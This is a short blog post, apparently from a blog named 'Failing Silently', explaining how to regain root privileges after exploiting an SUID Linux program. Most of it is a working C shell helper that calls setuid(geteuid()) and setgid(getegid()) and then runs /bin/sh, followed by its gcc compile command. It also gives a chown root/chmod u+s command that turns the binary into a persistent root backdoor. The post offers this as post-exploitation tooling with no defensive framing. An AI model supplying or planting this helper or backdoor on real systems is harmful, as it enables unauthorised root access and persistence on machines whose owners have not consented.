Many SUID Root Linux programs drop their root privileges when running, exploiting them therefore can result in a shell which apparently only has the same privileges as the user. This is frequently seen when exploiting a call to the system() function. Restoring those privileges is a simple case of calling a library function: setuid().
To help with this, you can use the following C code
#include <unistd.h>
#include <stdio.h>
int main(int argc, char *argv)
{
printf("Please enjoy this complimentary shell:\n");
setuid(geteuid());
setgid(getegid());
execl("/bin/sh", "sh", NULL);
return(0);
}
Compile with GCC
gcc restore.c -o elevatedshell
And then get your exploit to run the program.
If you manage to find a way to arbitrarily set the owner of a file to root, and enable the SUID bit, this file can also be used as a backdoor
chown root:root elevatedshell && chmod u+s elevatedshell
You can’t do this with an interpreted bash script, linux will simply ignore the SUID bit for .sh files, but it does work with compiled programs.
Failing Silently 